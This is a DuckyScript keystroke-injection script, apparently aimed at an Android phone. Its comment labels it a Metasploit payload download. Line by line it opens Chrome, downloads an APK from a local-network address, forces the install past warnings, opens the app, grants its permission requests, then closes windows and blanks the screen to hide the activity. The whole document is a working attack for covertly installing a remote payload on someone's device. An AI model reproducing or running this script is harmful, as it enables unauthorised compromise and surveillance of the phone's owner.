REM DOWNLOAD_METASPLOIT_PAYLOAD

REM WAKE_UP
DELAY 1000
ESC
DELAY 1000
ESC
DELAY 1000
GUI d

REM LAUNCH_CHROME
DELAY 1000
GUI f
DELAY 5000
STRING chrome
DELAY 1000
ENTER
DELAY 1000
ENTER
DELAY 10000
CTRL l
DELAY 1000

REM GOTO_WEBSITE
STRING http://192.168.1.98/unique.apk
DELAY 1000
ENTER
DELAY 5000

REM TAB_TO_KEEP
TAB
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 5000

REM OPEN_DOWNLOADS
CTRL j
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000

REM CLICK_INSTALL
ENTER
DELAY 5000
TAB
DELAY 1000
ENTER

REM INSTALL_ANYWAYS
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
ENTER

REM CLICK_OPEN
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 1000
ENTER

REM ACCEPT_ACCESS
DELAY 10000
ENTER
DELAY 1000
SHIFT TAB
DELAY 1000
ENTER
DELAY 10000
TAB
DELAY 1000
ENTER
DELAY 1000

REM CLEAR_SCREEN
ALT F4
DELAY 1000
ALT F4
DELAY 1000
POWER
